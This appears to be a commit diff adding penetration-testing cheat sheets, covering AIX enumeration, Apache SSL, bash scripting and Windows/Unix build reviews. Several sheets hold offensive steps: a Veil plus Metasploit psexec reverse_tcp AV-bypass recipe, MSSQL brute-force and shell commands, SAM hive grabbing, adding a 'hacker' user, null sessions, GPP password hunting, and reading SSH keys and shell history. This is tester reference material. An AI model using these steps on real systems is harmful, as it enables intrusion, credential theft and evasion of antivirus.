Added files via upload

Cheatsheet_AIXBuild.txt

@@ -0,0 +1,37 @@
+loslevel:
+--------
+
+Reports back on installed service pack, maintenance etc. levels of the AIX deployment.
+Most of these appear to return absolutely nothing or loads of information.
+
+oslevel          (reports back the overall AIX version e.g. 6.1.0.0)
+oslevel -q     (reports back known maintenance levels on the host)
+oslevel -rq    (reports back known Recommended Maintenance Levels, think major releases)
+oslevel -sq    (reports back known Service Packs - has returned a load of service pack numbers for me, these are useful when looking at products in relation to the service pack)
+
+e.g.
+oslevel -s -g 6100-08-03-1339
+
+lslpp:
+------
+
+Displays information about installed filesets/software and updates. It's particularly useful when coupled with the information returned by itself
+
+e.g.
+lslpp -l         (lists all packages, most recent level and state of them)
+The package names can be passed back to it for more info, showing their patch management/application cycle.
+
+e.g. 
+lslpp -h bos.rte   - returns information regarding the updates applied to the Base Operating System package. bos.rte
+
+rpm:
+----
+
+Standard redhat package manager, has turned up on a few machines.
+
+rpm -qa 
+rpm -qa --last
+These will report back packages installed by rpm and when.
+
+Other than those, it's the same combination of looking through directories and permissions on files. I usually end up checking through with "find" and the "-perm" flag:
+e.g. find /home/ -perm 777

Cheatsheet_AVBypass.txt

@@ -0,0 +1,14 @@
+1. Generate executable using Veil.
+
+2. In msfconsole setup psexec with relevant payload (windows/meterpreter/reverse_tcp)
+
+msf > use exploit/windows/smb/psexec
+msf exploit(psexec) > set RHOST 192.168.0.2
+RHOST => 192.168.0.2
+msf exploit(psexec) > set SMBUser user
+SMBUser => user
+msf exploit(psexec) > set SMBPass pass
+SMBPass => pass
+msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exe
+EXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe
+msf exploit(psexec) > exploit

Cheatsheet_ApacheSSL.txt

@@ -0,0 +1,37 @@
+# Enabling Self signed certificates on local website
+
+1. Install OpenSSL
+
+sudo apt-get install openssl
+
+2. Run the following command to generate the self signed SSL certificates:
+
+sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key
+
+3. Enable SSL for Apache
+
+sudo a2enmod ssl
+
+4. Put the default-ssl site available creating a symbolic link
+
+sudo ln -s /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/000-default-ssl.conf
+
+5. Edit the file default-ssl.conf
+
+sudo nano /etc/apache2/sites-enabled/000-default-ssl.conf
+
+Change the following lines to point to the certs:
+
+SSLCertificateFile    /etc/ssl/certs/server.crt
+SSLCertificateKeyFile /etc/ssl/private/server.key
+
+6. Restart Apache
+
+sudo /etc/init.d/apache2 restart
+
+More information:
+https://hallard.me/enable-ssl-for-apache-server-in-5-minutes/
+https://www.sslshopper.com/article-how-to-create-and-install-an-apache-self-signed-certificate.html
+http://www.akadia.com/services/ssh_test_certificate.html
+https://www.sslshopper.com/apache-server-ssl-installation-instructions.html
+http://www.emreakkas.com/linux-tips/invalid-command-sslengine-enabling-ssl-on-ubuntu-server

Cheatsheet_AttackingMSSQL.txt

@@ -0,0 +1,21 @@
+[+] Attacking MSSQL with Metasploit
+
+[>] Enumerate MSSQL Servers on the network:
+
+msf > use auxiliary/scanner/mssql/mssql_ping
+nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156
+Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio.
+
+[>] Bruteforce MSSQL Database:
+
+msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login
+
+[>] Enumerate MSSQL Database:
+
+msf > use auxiliary/admin/mssql/mssql_enum
+
+[>] Gain shell using gathered credentials
+
+msf > use exploit/windows/mssql/mssql_payload
+msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
+

Cheatsheet_BashScripting.txt

@@ -0,0 +1,129 @@
+Simple Bash Scripting Cheatsheet
+--------------------------------
+
+[+] nano Shortcuts
+ctrl v			Next page.
+ctrl y			Previous page.
+ctrl w			Where is (find).
+ctrl k			Cut that line of test.
+ctrl x     		Exit editor.
+
+[+] Create a text file:
+touch file		Creates an empty file.
+ifconfig > tmp	pipe the output of a command
+nano file
+
+[+] Create a file and append text to it:
+ifconfig > tmp     
+echo >> tmp
+ping google.com -c3 >> tmp
+
+[+] How to view a file:
+cat file		Show entire contents of file.
+more file		Show one page at a time.  Space bar for next page and (q) to exit.
+head file		Show the first 10 lines.
+head -15 file	Show the first 15 lines.
+tail file		Show the last 10 lines.
+tail -15 file	Show the last 15 lines.
+tail -f file	Useful when viewing the output of a log file.
+
+[+] pipe
+cat tmp | grep Bcast	Feeds the output of one process to the input of another process.
+
+[+] Processes
+ps aux			Show all running process for all users.
+kill -9 PID		Nicely kill a PID.
+
+[+] Word Count
+wc -l tmp2		Count the number of lines in a file
+
+[+] cut
+-d  delimiter
+-f  fields
+
+[+] sort
+Sort by unique		sort -u file
+sort IP addresses correct		sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n
+cat tmp2 | cut -d '(' -f2 | cut -d ')' -f1 | sort -u		Isolate the IP address
+
+[+] awk
+awk '{print $1}' file 		Show the 1st column.
+awk '{print $1,$5}' file 	Show the 1st and 5th columns.
+
+[+] grep
+grep -v		Remove a single string.
+grep -v 'red' file
+
+[+] egrep -v
+Remove multiple strings	egrep -v '(red|white|blue)' file
+
+[+] sed
+sed 's/FOO/BAR/g' file 		Replace FOO with BAR.
+sed 's/FOO//g' file 		Replace FOO with nothing.
+sed '/^FOO/d' file 			Remove lines that start with FOO.
+
+[+] colour
+31=red 32=green 33=yellow 34=blue 35=magenta 36=cyan 
+echo -e "\e[1;34mThis is a blue text.\e[0m"
+
+
+
+
+Bash Scripts
+------------
+
+[+] Simple bash script:
+#!/bin/bash
+clear
+echo
+echo
+print "Hello world."
+
+[+] Make a file executable.
+chmod +x file
+chmod 755 file
+
+[+] Variables
+name=Bob
+echo $name
+user=$(whoami)
+echo $user
+echo 'Hello' $name. 'You are running as' $user.
+
+#!/bin/bash
+clear
+echo "Hello World"
+name=Bob
+ip=`ifconfig | grep "Bcast:" | cut -d":" -f2 | cut -d" " -f1`
+echo "Hello" $name "Your IP address is:" $ip
+
+[+] User Input
+read -p "Domain: " domain
+
+#!/bin/bash
+echo "Please input your domain:"
+read -p "Domain:" domain
+ping -c 5 $domain
+
+[+] Check For No User Input
+if [ -z $domain ]; then
+	echo
+	echo "#########################"
+	echo
+	echo "Invalid choice."
+	echo
+	exit
+fi
+
+[+] For loops
+#!/bin/bash
+
+for host in $(cat hosts.txt)
+do
+	command $host
+done
+
+[+] One Liners
+
+Port Scan:
+for port in $(cat Ports.txt); do nc -nzv 192.168.0.1 $port & sleep 0.5; done

Cheatsheet_BuildReviews.txt

@@ -0,0 +1,140 @@
+Build Review Cheatsheet
+-----------------------
+
+[+] Main tasks:
+
+Any third party installed software and all associated versions.
+Password policy applied locally via net accounts commands.
+Domain policy applied, including domain password policy.
+Logging settings.
+Running services and unquoted service paths.
+Permissions set on services.
+List of patches and hotfixes installed.
+Efficacy of AV solutions. May require import of a benign Eicar test file.
+USB policy and removable media access (including firewire, CD etc).
+Disk encryption (if relevant)
+BIOS passwords set.
+Proxy settings (if relevant).
+Nessus Scan (With Credentials).
+
+[+] Windows Hosts:
+
+[+] Server Roles
+[+] Server Manager
+[+] System Properties
+[+] Default Domain Policy
+[+] Global Domain Policy
+
+[+] Net accounts/Users/groups/Administrators
+[+] IPConfig/Routing
+
+[+] Installed Programs
+[+] Installed System Updates
+[+] AV Version/Definition Dates
+[+] Check Computer folders
+
+[+] Firewall Configuration
+[+] Audit Policy
+[+] Password/Lockout Policy
+[+] Security Policy
+[+] User Rights Policy
+
+[+] Lanman Parameters (HKLM - System - Current Control - Services - LanmanServer - Parameters)
+[+] LSA (HKLM - System - Current Control - Control - LSA)
+[+] MSV (HKLM - System - Current Control - Control - LSA - MSV1_0)
+
+systeminfo command
+
+BIOS password
+boot to usb
+file system
+- encrypted?
+- grab /Windows/System32/config/SAM SECURITY SYSTEM
+- put C:\Program.exe (eg calc)
+
+Control Panel
+- Windows Firewall
+   - enabled
+   - editable
+   - logs
+- System Info
+- Windows Update
+
+Anti-Virus
+- config
+- logs
+- version
+- dates
+- EICAR
+
+cmd.exe
+script.cmd
+- ipconfig /all
+- netstat
+- net accounts
+- net accounts /domain (review password policy)
+- net user hacker Password@1 /add
+- regedit
+- ping
+- sched
+- tracert
+- net use \\IP address_or_host name\ipc$ "" /user:""  # null session
+- net use
+- net view
+- net start 	
+- tasklist
+
+mount usb
+usb autostart
+
+copy over files
+- nc
+- enum
+- nmap
+- DIRE
+- EICAR
+
+# SAM files in backtrack
+/Windows/System32/config/SAM SECURITY SYSTEM
+
+# mounting on desktop review
+# mount <target> <mydir>
+# sda1 = client hdd, sdb2 = my usb part 2
+# mkdir /mnt/client-hdd
+# mount /dev/sda1 /mnt/client-hdd
+# mkdir /mnt/win-usb
+# mount /dev/sdb2 /mnt/win-usb
+
+hosts file C:\Windows\System32\drivers\etc\hosts.txt
+
+SYSVOL GPO preference item, check for obscured passwords in xml
+http://blogs.technet.com/b/grouppolicy/archive/2008/08/04/passwords-in-group-policy-preferences.aspx
+
+The history file is readable by any authenticated user, as shown below:
+C:\Users\All Users\Microsoft\Group Policy\History\{A1C0C41B-D2F8-401B-A5D1-437DA197A809}\Machine\Preferences\Groups\Groups.xml
+The same Group Policy Preference XML configuration file is also accessible via the following UNC path on the Domain Controller, again by any authenticated user:
+\\Domain_Controller\sysvol\Domain_Name\Policies\{A1C0C41B-D2F8-401B-A5D1-437DA197A809}\Machine\Preferences\Groups\Groups.xml
+
+
+[+] Unix Based Hosts:
+
+hostname
+whoami
+uname -a
+cat /etc/lsb-release
+dmesg | grep Linux
+cat /etc/passwd
+cat /etc/sudoers
+netstat -antup
+ps -aux
+ps aux | grep root
+crontab -l
+/sbin/ifconfig -a
+iptables -L
+arp -e
+cat ~/.bash_history
+cat ~/.ssh/authorized_keys
+mount
+
+- Check installed applications
+- Check installed compilers/interpreters